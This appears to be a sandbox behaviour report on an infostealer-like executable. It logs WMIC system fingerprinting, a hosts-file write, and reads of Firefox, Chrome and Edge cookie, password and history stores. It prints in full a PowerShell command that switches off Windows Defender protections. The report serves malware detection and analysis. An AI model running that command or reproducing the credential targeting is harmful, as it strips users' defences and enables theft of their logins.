Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\fyne VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Desktop VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Desktop VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Downloads VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Downloads VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Epic Games VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents\My Videos VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Documents\My Videos VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Videos VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\Pictures VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Default\OneDrive VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Downloads VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Epic Games VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents\My Videos VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Documents\My Videos VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Pictures VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\Public\Videos VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\Documents\LSBIHQFDVT VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\DmI602ZFyp.exe File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events
